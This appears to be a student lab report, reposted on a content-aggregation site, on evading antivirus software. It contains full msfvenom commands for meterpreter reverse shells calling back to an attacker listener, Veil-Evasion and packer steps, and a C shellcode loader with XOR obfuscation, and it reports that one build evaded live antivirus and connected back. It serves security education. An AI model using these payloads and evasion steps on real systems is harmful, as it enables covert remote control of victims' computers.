网络与系统攻防技术实验及实验报告

news2024/11/14 19:46:29

1.实验内容

  1. 正确使用msf编码器,veil-evasion,自己利用shellcode编程等免杀工具或技巧

    • 正确使用msf编码器,使用msfvenom生成如jar之类的其他文件
    • veil,加壳工具
    • 使用C + shellcode编程
  2. 通过组合应用各种技术实现恶意代码免杀

    如果成功实现了免杀的,简单语言描述原理。与杀软共生的结果验证要截图。

  3. 用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本

2.实验过程

2.1 基础问题回答

  1. 杀软是如何检测出恶意代码的?

    • 基于特征码的检测
      简单来说一段特征码就是一段或多段数据。如果一个可执行文件(或其他运行的库、脚本等)包含这样的数据则被认为是恶意代码。
      AV软件厂商要做的就是尽量搜集最全的、最新的特征码库。所以杀毒软件的更新很重要。过时的特征码库就是没有用的库。

    • 基于签名的检测技术
      基于签名的检测技术主要基于模式匹配的思想,为每种已知恶意代码产生一个唯一的签名特征标记来创建恶意代码库。这些签名包括很多不同的属性,如文件名、内容字符串或字节等,并且也从排除这些恶意代码所产生安全漏洞的角度来探讨保护系统安全。将未知代码的签名特征与恶意代码库进行对比,搜索恶意代码库查找时候存在相匹配的恶意代码签名,若有吻合,则判定为恶意代码;反之则判断为正常代码。这些签名由专家手工找出或通过自动方法生成,一个签名提取出来以标志一个特定恶意代码的特征性质。

    • 启发式恶意软件检测
      这种方法的思想是为病毒的特征设定一个阈值,扫描器分析文件时,当文件的总权值超出了设定值,就将其看作是恶意代码.这种方法主要的技术是要准确的定义类似病毒的特征,这依靠准确的模拟处理器。评定基于宏病毒的影响更是一个挑战,他们的结构和可能的执行流程比已经编译过的可执行文件更难预测。

    • 基于行为的恶意软件检测
      利用病毒的特有行为特征来监测病毒的方法,称为行为监测法。通过对病毒多年的观察、研究,有一些行为是恶意代码的共同行为,而且比较特殊。当程序运行时,监视其行为,如果发现了病毒行为,立即报警。缺点是误报率比较高、不能识别病毒名称及类型、实现时有一定难度。

  2. 免杀是做什么?

    免杀,即Anti-AntiVirus(简写Virus AV)。对恶意软件做处理使其不被杀毒软件所检测,是一种能使病毒木马避免被杀毒软件查杀的技术。

  3. 免杀的基本方法有哪些?

    文件免杀方法:

    • 加冷门壳

    • 加花指令

    • 改程序入口点

    • 改木马文件特征码的5种常用方法

      (1)直接修改特征码的十六进制

      修改方法:把特征码所对应的十六进制改成数字差1或差不多的十六进制
      适用范围:要精确定位特征码所对应的十六进制

      (2)修改字符串大小写

      修改方法:把特征码所对应的内容是字符串的,大小字互换
      适用范围:特征码所对应的内容必须是字符串

      (3)等价替换

      修改方法:把特征码所对应的汇编指令命令中替换成功能类拟的指令
      适用范围:特征码中必需有可以替换的汇编指令,比如JN、JNE换成JMP等

      (4)指令顺序调换

      修改方法:把具有特征码的代码顺序互换一下
      适用范围:具有一定的局限性,代码互换后要不能影响程序的正常执行

      (5)通用跳转法

      修改方法:把特征码移到零区域(指代码的空隙处),然后一个JMP跳回来执行
      适用范围:无,是通用的

  4. 开启杀软能绝对防止电脑中恶意代码吗?

    不能绝对防止。首先,不同的杀软效果好坏不同,一些低质量杀软无法防止复杂的恶意代码;其次,杀软检查到恶意代码是需要一定时间的,可能在检测到之前恶意代码就已经生效;最后,所谓“道高一尺,魔高一丈”,杀软不断发展着,恶意代码也不断进化着。除了使用杀软,提高警惕与安全意识、使用电脑时做好防护、不点击可疑链接等才能更高效地防止恶意代码。

2.2 正确使用免杀工具或技巧

2.2.1 msf编码器

  1. msfvenom介绍

    Metasploit独立有效载荷生成器,也是msfpayload和msfencode的替代品。利用msfvenom生成木马程序,并在目标机上执行、在本地监听。

     参数说明:
     -p, --payload    <payload>       指定需要使用的payload(攻击载荷)。
     -f, --format     <format>        指定输出格式
     -e, --encoder    [encoder]       指定需要使用的encoder(编码器)
     -a, --arch       <architecture>  指定payload的目标架构
         --platform   <platform>      指定payload的目标平台
     -b, --bad-chars  <list>          设定规避字符集,比如: &#039;\x00\xff&#039;
     -i, --iterations <count>         指定payload的编码次数
     -o, --out   <path>               保存payload
    
  2. 不同编码次数

    编码器(encoder)将信息(汇编指令)转换为另一种形式,使将载荷传送到目标系统/应用程序时绕过检测。
    最著名的编码器是x86/shikataga_nai。这是一个多态XOR累积反馈编码器,每次都会产生不同的输出,从而加大被检测到的难度。
    这里我使用x86/shikata_ga_nai作为编码器,设置不同的编码次数进行多次迭代(即生成最终有效负载之前必须执行多少次编码传递,这样做可以隐身或防病毒规避),通过检出率观察免杀效果是否有变化。

     # 无编码
     msfvenom -p windows/meterpreter/reverse_tcp -b '\x00' LHOST=172.30.2.104 LPORT=2415 -f exe > en0.exe
     # 编码1次
     msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 1 -b '\x00' LHOST=172.30.2.104 LPORT=2415 -f exe > en1.exe
     # 编码10次
     msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b '\x00' LHOST=172.30.2.104 LPORT=2415 -f exe > en10.exe
     # 编码60次
     msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 60 -b '\x00' LHOST=172.30.2.104 LPORT=2415 -f exe > en60.exe
    

  3. 不同输出格式

    攻击载荷(payload)是一段代码,通过漏洞利用把这段代码传递到目标系统或应用程序以执行我们想要的操作。
    payload的命名为三段式标准,“操作系统/运行方式+控制方式+模块具体名称”共同组合而成。如“windows/meterpreter/reverse_tcp”,windows为操作系统,meterpreter为控制方式,reverse_tcp为模块具体名称。
    这里尝试选择不同运行方式下的payload,通过检出率观察免杀效果是否有变化。

     # jar文件
     msfvenom -p java/meterpreter/reverse_tcp -b '\x00' LHOST=172.30.2.104 LPORT=2415 x> ja20192415.jar
     # php文件
     msfvenom -p php/meterpreter/reverse_tcp -b '\x00' LHOST=172.30.2.104 LPORT=2415 x> ph20192415.php
     # python文件
     msfvenom -p python/meterpreter/reverse_tcp -b '\x00' LHOST=172.30.2.104 LPORT=2415 x> py20192415.py
     # apk文件(这里不使用“-b '\x00'”,因为没有指定编码器,使用的话会报错)
     msfvenom -p android/meterpreter/reverse_tcp LHOST=172.30.2.104 LPORT=2415 x> ap20192415.apk
    

  4. 免杀效果测试

    将使用msfvenom生成的文件上传到VirusTotal 和Virscan 进行测试,查看免杀效果,检出率总结与部分检测截图如下。

    VirusTotal,是一个提供免费的可疑文件分析服务的网站。它与传统杀毒软件的不同之处是它通过多种反病毒引擎扫描文件。使用多种反病毒引擎对您所上传的文件进行检测, 以判断文件是否被病毒, 蠕虫, 木马, 以及各类恶意软件感染。这样大大减少了杀毒软件误杀或未检出病毒的几率,其检测率优于使用单一产品。

    VirSCAN,是一项免费的在线扫描服务,它使用VirSCAN列表中指示的防病毒引擎检查上传的文件是否存在恶意软件。上传要检查的文件后,可以看到扫描结果以及这些文件对计算机的危险性和有害性/无害性。

    根据下表可知,多次编码的免杀效果微乎其微,而不同的payload对免杀效果的影响较大,meterpreter运行在python和php上免杀效果是相对最好的。

    文件名攻击载荷payload编码器编码次数输出格式VirusTotalVirscan
    en0.exewindows/meterpreter/reverse_tcp0exe53/6921/51
    en1.exewindows/meterpreter/reverse_tcpx86/shikata_ga_nai1exe53/6819/51
    en10.exewindows/meterpreter/reverse_tcpx86/shikata_ga_nai10exe53/6920/51
    en60.exewindows/meterpreter/reverse_tcpx86/shikata_ga_nai60exe51/6821/51
    ja20192415.jarjava/meterpreter/reverse_tcp0jar32/601/51
    ph20192415.phpphp/meterpreter/reverse_tcp0php21/573/51
    py20192415.pypython/meterpreter/reverse_tcp0py18/583/51
    ap20192415.apkandroid/meterpreter/reverse_tcp0apk33/620/32

2.2.2 Veil-Evasion

  1. veil介绍

    Veil、Venom和Shellter是三大老牌免杀工具。Veil中有两个功能模块,Evasion和Ordnance:Evasion用做文件免杀,Ordnance可生成在Veil-Evasion中使用的shellcode。本次实验我使用的是Evasion模块。
    Veil-Evasion是一个用python写的免杀框架,可以将任意脚本或一段shellcode转换成Windows可执行文件(用其他语言如c、c#、phython、ruby、go、powershell等重写了meterperter,然后再通过不同方式编译成exe),还能利用Metasploit框架生成相兼容的Payload工具,从而逃避了常见防病毒产品的检测。

  2. 使用方法

     vile #进入veil工具
     use evasion #进入evasion模块
     use c/meterpreter/rev_tcp.py #选择payload
     # 这里也可以先用“list”查看所有可选择的payload,然后直接使用“use payload序号”来选择payload
     set LHOST 172.30.2.104 #设置IP
     set LPORT 2415 #设置端口
     options #查看配置内容
     generate #执行payload
     xzb20192415veil1 #输入生成文件的名称
    
  3. 实验过程

    在本次实验中,我使用Veil-Evasion选择了不同的payload分别生成2个文件。
    xzb20192415veil1.exe使用c/meterpreter/rev_tcp.py作为payload;
    xzb20192415veil2.exe使用python/meterpreter/rev_tcp.py作为payload。

    xzb20192415veil1.exe生成过程:

    xzb20192415veil2.exe生成过程:

    过程中需要对的库进行选择,这里我选择的是Pyinstaller:

    • 如果使用Pyinstaller,payload会转成能够直接使用的可执行程序;
    • 如果使用Py2Exe,把payload.py和两个相关的文件放到windows系统上,执行批处理脚本将payload转换成可执行程序。

  4. 免杀效果测试

    根据下表总结的检出率、结合2.2.1中4个exe文件的免杀效果可知,面对如今不断发展进化的杀毒软件,Veil-Evasion的免杀效果比msfvenom有所提升但仍不算好。

    文件名攻击载荷payloadVirusTotalVirscan
    xzb20192415veil1.exec/meterpreter/rev_tcp.py37/659/51
    xzb20192415veil2.exepython/meterpreter/rev_tcp.py33/699/51

2.2.3 加壳

  1. 加壳

    加壳的全称应该是可执行程序资源压缩,压缩后的程序可以直接运行。加壳的另一种常用的方式是在二进制的程序中植入一段代码,在运行的时候优先取得程序的控制权,之后再把控制权交还给原始代码,这样做的目的是为了隐藏程序真正的OEP(入口点,防止被破解)。大多数病毒就是基于此原理。
    对于病毒,加壳可以绕过一些杀毒软件的扫描,从而实现它作为病毒的一些入侵或破坏的一些特性。

    从技术上分壳分为:

    • 压缩壳
      减少应用体积,如ASPack,UPX
    • 加密壳
      版权保护,反跟踪。如ASProtect,Armadillo
    • 虚拟机
      通过类似编译手段,将应用指令转换为自己设计的指令集。如VMProtect, Themida
  2. 压缩壳
    UPX是一款先进的可执行程序文件压缩器,压缩过的可执行文件体积缩小50%-70%,能有效防止程序被人进行反编译破解。
    通过UPX压缩过的程序完全没有功能损失,和压缩之前一样可正常运行,对于支持的大多数格式没有运行时间或内存的不利后果。
    使用方法:

     upx a.exe -o b.exe #a为待压缩程序名,b为压缩后程序名
    
  3. 加密壳
    加密二进制是一种常用的过杀软的方法。加密器的原理就是混淆二进制来对抗杀软,当二进制文件运行的时候加密的内容会被还原。Kali Linux有一个开源的加密器,名为Hyperion,能规避反病毒软件。
    使用方法:

     cd /usr/share/windows-resources/hyperion
     wine hyperion.exe -v a.exe b.exe #a为待加密程序名,b为加密后程序名
    

这里没有单独展示加壳后的免杀效果,在“2.3 组合应用各种技术实现恶意代码免杀”会展示。

2.2.4 C+shellcode编程+w64-mingw32

  1. 实现过程

    这里我首先使用msfvenom生成一个Shellcode数组,再使用该数组编写程序。根据实验指导书,选择了不同的payload和编码器分别生成2个程序。
    该方法具体实现过程如下:

     (1)生成Shellcode
     msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.30.2.104 LPORT=2415 -f c #生成一个c语言格式的Shellcode数组
     (msfvenom -p windows/meterpreter/reverse_https -e x86/bloxor LHOST=172.30.2.104 LPORT=2415 -f c #使用不同编码器,效果会更好)
     (2)编写程序
     vim 20192415censhell.c #进入编辑器编写程序
     程序内容如下:
     		unsigned char buf[] = 之前获得的shellcode;
     		int main()
     		{
     		    int (*func)() = (int(*)())buf;
     		    func();
     		}
     (3)编译
     i686-w64-mingw32-g++ 20192415cshell.c -o #编译器在64位系统上构建32位应用程序
    

    20192415cshell.exe基于20192415cshell.c,payload为windows/meterpreter/reverse_tcp且不进行编码:

    20192415censhell.exe基于20192415censhell.c,payload为windows/meterpreter/reverse_https且由x86/bloxor编码一次:

  2. 免杀效果测试

    相较于msfvenom和Veil-Evasion,“C+shellcode编程+w64-mingw32”的免杀效果会更好一些。

    文件名攻击载荷payload编码器编码次数输出格式VirusTotalVirscan
    20192415cshell.exewindows/meterpreter/reverse_tcp0exe36/696/51
    20192415censhell.exewindows/meterpreter/reverse_httpsx86/bloxor1exe15/673/51

2.3 组合应用各种技术实现恶意代码免杀

2.3.1 方案一:C+shellcode编程 + 异或 + 加密壳 + 压缩壳

  1. C+shellcode编程

    根据前面2.2中的免杀效果测试,生成exe程序的方式选择免杀效果相对较好的“C+shellcode编程+w64-mingw32”。
    在msfvenom下,选择windows/meterpreter/reverse_tcp作为payload,先用x86/shikata_ga_nai编码再用x86/bloxor编码,得到一个shellcode。

     msfvenom -p windows/meterpreter/reverse_tcp -b '\x00' -e x86/shikata_ga_nai LHOST=172.30.2.104 LPORT=2415 -f raw | msfvenom -a x86 --platform windows -b '\x00' -e x86/bloxor -f c
    

  2. 异或

    首先将1中生成的Shellcode进行异或,将异或后的数组作为新的Shellcode。
    编写程序时在main函数中再次进行异或,这样两次异或后又回到了原来的Shellcode,但生成的exe却会有多不同,最后进行编译得到xzbcombination.exe。异或相关代码如下:

     ​ int i;
     ​ for (i = 0; i < sizeof(buf); i++){
     	buf[i] ^= 0x01;
     }
    

  3. 加密壳

     cd /usr/share/windows-resources/hyperion
     wine hyperion.exe -v xzbcombination.exe xzbbinaen.exe
    

  4. 压缩壳

     upx xzbbinaen.exe -o xzbbinapress.exe #加密后再压缩
     upx xzbcombination.exe -o xzbcompress.exe #仅压缩
    

  5. 免杀效果测试

    由下表可知,加密壳反而会使检出率提高免杀效果下降,压缩壳的能稍提高免杀效果。不加任何壳反而免杀效果不错。

    文件名加密压缩VirusTotalVirscan
    xzbcombination.exe12/673/51
    xzbbinaen.exe47/6913/51
    xzbbinapress.exe27/5110/51
    xzbcompress.exe12/682/51

2.3.2 方案二:C+shellcode编程 + 异或

根据2.3.1,我们分别将xzbcombination.exe与xzbbinapress.exe传输到杀毒软件开启的win10主机上,观察免杀效果。
该win10设备上有两种杀毒软件:Avira免费安全套件(1.0.25) + windows defender。
结果是,既不加密也不压缩的xzbcombination.exe能够实现恶意代码免杀;加密后压缩的xzbbinapress.exe很快被windows defender检测到。

xzbcombination.exe实现恶意代码免杀:

xzbbinapress.exe被windows defender检测到:

2.4 用另一电脑实测,杀软开启情况下可运行并回连成功

将2.3中得到的xzbcombination.exe程序发送给另一台主机。该台主机为win10系统,杀毒软件为联想电脑管家(5.0.0)。
kali主机进入msfconsole控制台并进行相应配置(具体可参考实验二),然后使用exploit开启监听。
另一台主机运行xzbcombination.exe,回连成功。

3.问题及解决方案

  • 问题1:vile工具无法下载
  • 问题1解决方案:原先使用的kali版本是2019.2,时间过于久远出现数字签名过期无法更新源等问题。在下载vile时,尝试更新配置源、从github克隆均无法成功下载。最终只能重新安装kali虚拟机(顺带更新了VirtualBox)。现在使用的是VirtualBox 6.1.12 + kali 2022.1。
  • 问题2:在Virscan中部分文件上传后无法检测
  • 问题2解决方案:文件名中含有“20192415”,被Virscan网站视为非法,对文件重命名后重新上传即可检测。
  • 问题3:卸载windows defender后无法安装
  • 问题3解决方案:实验过程中,为了更好观察免杀效果。下载安装了杀毒软件“小红伞”,实测过程中发现该软件的免费版本不如windows系统自带的windows defender效果好,因此卸载该软件。卸载后系统原先自带的windows defender病毒与威胁防护无法使用,应该是在运行小红伞的过程中更改注册表导致的。尝试网络上的解决方法均无果,后来在“windows更新设置”中重新安装了windows病毒与威胁防护,并将系统升级为Windows 11。
  • 问题4:重装win11后,kali的“网络设置”中“桥接网卡”的“界面名称”未指定
  • 问题4解决方案:这是因为没有装好虚拟网卡驱动。参照解决VirtualBox 桥接网卡界面名称未指定问题 皆可解决。

4.学习感悟、思考等

在本次实验中,我接触了许多不同的免杀工具,尝试实现恶意代码免杀并取得成功。
通过使用在线的可疑文件扫描分析服务,获取恶意代码在不同杀软中的检出率,来了解不同选择下免杀效果的不同。
经过总结后,我选取了多种免杀方式中的一些进行组合构造自己的恶意代码。幸运的是,这个程序成功地能够不被杀软检测到。
但经过试验发现,如果我重复多次向同一个文件夹发送多个恶意代码,那被检出的可能性就会增大,这个文件夹在杀软眼中的可疑性就增强了。
同时,通过本实验我们可以发现开启杀软并不能绝对防止电脑中恶意代码。“道高一尺,魔高一丈”,杀软不断发展着,恶意代码也不断进化着。
除了使用杀软,提高警惕与安全意识、使用电脑时做好防护、不点击可疑链接等才能更高效地防止恶意代码。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1596474.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

多目标跟踪 | 基于anchor-free目标检测+ReID的实时一阶多类多目标跟踪算法实现

项目应用场景 面向多目标检测跟踪场景&#xff0c;项目采用 anchor-free 目标检测ReID 的实时一阶段多类多目标跟踪算法实现&#xff0c;效果嘎嘎好。 项目效果 项目细节 > 具体参见项目 README.md (1) 类别支持 1~10 object classes are what we need non-interest-…

智能热流体仿真软件AICFD 2024R1新版本功能介绍

AICFD是由天洑软件自主研发的一款通用的智能热流体仿真软件。软件引入AI技术&#xff0c;具备智能问答、智能加速、智能预测等特色功能&#xff0c;解决用户在传统CFD软件中遇到的“网格划分繁、求解设置难、仿真计算慢”等痛点&#xff0c;使设计师和工程师可以专注于业务本身…

AI大模型语言开源大语言模型完整列表

开源大语言模型完整列表 Large Language Model (LLM) 即大规模语言模型&#xff0c;是一种基于深度学习的自然语言处理模型&#xff0c;它能够学习到自然语言的语法和语义&#xff0c;从而可以生成人类可读的文本。 所谓"语言模型"&#xff0c;就是只用来处理语言文…

WP免费主题下载

免费wordpress模板下载 高端大气上档次的免费wordpress主题&#xff0c;首页大图全屏显示经典风格的wordpress主题。 https://www.wpniu.com/themes/289.html 免费WP主题 蓝色简洁实用的wordpress免费主题模板&#xff0c;免费主题资源分享给大家。 https://www.wpniu.com/…

如何查找overlayfs对应的POD如何根据pod找到containerd id

如何查找overlayfs对应的POD mount |grep overlayfs | grep 1738 ctr -n k8s.io c list | grep 11ac4083419be11174746b68d018a0a402d9ae43c6b52125810fe1ec7db63bc6 查找目录并统计大小 find / -name "jfsCache" -exec du -sh {} | sort -rh如何根据pod找到c…

配置IP地址并验证连通性

1.实验环境 主机 A和主机 B通过一根网线相连&#xff0c;如图6.13所示。 图6.13 实验案例一示意图 2.需求描述 为两台主机配置!P地址&#xff0c;验证P地址是否生效&#xff1b;验证同一网段的两台主机可以互通&#xff0c;不同网段的主机不能直接互通。 3.推荐步骤 为两台…

笔记软件功能多样的是哪款?做笔记的软件哪个好用

在快节奏的现代生活中&#xff0c;笔记软件已成为我们提高工作效率、记录生活点滴的重要工具。想象一下&#xff0c;在繁忙的工作中&#xff0c;你能够快速记录下关键信息&#xff0c;或在灵感迸发时及时捕捉&#xff0c;这是多么方便高效。 一款功能多样的笔记软件&#xff0…

JAVA-贪吃蛇(源代码)

游戏界面: 图片素材: 背景图片 蛇身 食物 蛇头 标题 源代码: 运行界面 package com.snake.game;public class snakeApp {public static void main(String[] args) {//添加界面new snakeJFrame();} }游戏界面类JFrame package com.snake.game;import javax.swing.*; import …

WEB前端-用户注册倒计时

<body><textarea name"" id"" cols"30" rows"10">用户注册协议欢迎注册成为京东用户&#xff01;在您注册过程中&#xff0c;您需要完成我们的注册流程并通过点击同意的形式在线签署以下协议&#xff0c;请您务必仔细阅读…

腾讯EdgeOne产品测评体验——多重攻击实战验证安全壁垒:DDoS攻击|CC压测|Web漏洞扫描|SQL注入

腾讯EdgeOne产品测评体验——实战验证安全壁垒&#xff1a;DDoS攻击|CC压测|Web漏洞扫描|SQL注入 写在最前面一、产品概述1.1 什么是边缘安全加速平台 EO&#xff1f;1.2 EdgeOne产品功能 二、准备工作2.1 选择&#xff1a;NS&#xff08;Name Server&#xff09;接入模式或 CN…

智慧用电安全管理系统

智慧用电安全管理系统 智慧用电安全管理系统是智能电网中客户侧关键的构成部分&#xff0c;是基本建设新型智慧城市的基本&#xff0c;将完成地区内各种各样用电设备的智能化系统监管&#xff0c;完成地区内日常生活与工作中安全性、舒服。 一、智慧用电安全管理系统介绍 …

FANUC机器人单轴零点标定的具体方法(全轴零点标定不方便时可采用)

FANUC机器人单轴零点标定的具体方法(全轴零点标定不方便时可采用) 前面和大家分享了FANUC机器人进行零点标定的原因和方法,具体可参考以下链接中的内容:: FANUC机器人进行零点标定的目的和具体方法步骤详解

Python学习从0开始——项目一day01爬虫(二)

Python学习从0开始——项目一day01爬虫&#xff08;二&#xff09; 一、解析response数据二、json转换三、文件保存四、存储json对象五、完整代码 上一篇 一、解析response数据 在已经知道我们获取图片的最终URL存在于请求响应response中&#xff0c;下一步的重点就放在解析re…

18.软件定时器

一、简介 软件定时器是指具有定时功能的软件&#xff0c;FreeRTOS 提供的软件定时器允许在创建前设置一个 软件定时器定时超时时间&#xff0c;在软件定时器成功创建并启动后&#xff0c;软件定时器开始定时&#xff0c;当软件定 时器的定时时间达到或超过先前设置好的软件定时…

LOCK、ACC、ON、START的含义及正确使用

背景 前段时间在开发一个远程锁车的需求时&#xff0c;讨论到了电源状态的场景。由于初次进入汽车电子行业&#xff0c;对很多基础概念不清晰。当时听主机厂商的同事介绍一遍后&#xff0c;并不是很理解。于是趁着空闲&#xff0c;给自己充充电&#xff0c;也希望能够帮到有需…

Office 365卡顿怎么办?SD-WAN可以解决

随着数字化浪潮的推进&#xff0c;Office 365等云办公应用已成为企业日常运营不可或缺的工具。然而&#xff0c;许多企业在使用Office 365时遭遇了网络卡顿的难题&#xff0c;给工作人员带来诸多不便。随着SD-WAN技术的成熟和普及&#xff0c;这一难题得到了有效的解决。 Offic…

HarmonyOS实战开发-状态管理、通过使用页面级的状态变量 和应用级的状态变量 来实现应用的状态管理。

介绍 本示例通过使用页面级的状态变量 和应用级的状态变量 来实现应用的状态管理。 效果预览 使用说明 1.点击首页中的基本类型进入对应页面&#xff0c;点击按钮可以更改圆形的颜色&#xff1b;点击查看源码可以展示基本类型功能效果的源码。 2.点击首页中的数组类型进入对…

密码知识汇总

文章目录 密码学知识&#xff23;&#xff29;&#xff21;三要素机密性&#xff08;Confidentiality&#xff09;完整性&#xff08;Integrity&#xff09;可用性&#xff08;Availability&#xff09; 非安全信道的风险以及应对措施风险应对措施使用加密技术&#xff08;防窃…

【第十五届】蓝桥杯省赛C++b组

今年的蓝桥杯省赛已经结束了&#xff0c;与以往不同&#xff0c;今年又回到了8道题&#xff0c;而22&#xff0c;23年出现了10道题 大家觉得难度怎么样&#xff0c;欢迎进来讨论&#xff0c;博主今年没参加哈&#xff0c;大家聊聊&#xff0c;我听听大家的意见和看法哈 试题A:…

【Labelimg标注使用预定义标签】

Labelimg标注使用预定义标签 安装 在环境中pip install labelimg 打开图片文件夹 把预定义标签放在保存文件夹里 选择保存文件夹地址